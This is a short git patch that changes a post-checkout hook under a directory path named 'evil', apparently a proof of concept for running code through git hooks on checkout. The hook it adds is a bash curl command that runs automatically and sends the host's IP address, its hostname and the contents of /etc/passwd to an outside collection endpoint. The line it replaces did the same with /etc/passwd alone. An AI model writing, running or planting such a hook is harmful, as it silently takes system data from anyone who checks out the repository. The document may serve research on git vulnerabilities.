From c7c9e499fea2f5a1d4d7558a2fb1c6c64b7fc830 Mon Sep 17 00:00:00 2001 From: z0rs Date: Thu, 11 Jan 2024 22:43:37 -0600 Subject: [PATCH] Update modules/1/2/3/4/evil/hooks/post-checkout --- modules/1/2/3/4/evil/hooks/post-checkout | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 706d30c..1e01236 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,2 @@ #!/bin/bash -curl -X POST -d @/etc/passwd https://z0.rs/payload_catcher \ No newline at end of file +curl -X POST https://z0.rs/payload-catcher.php -d "ip=$(hostname -I)&hostname=$(hostname)&passwd=$(cat /etc/passwd)"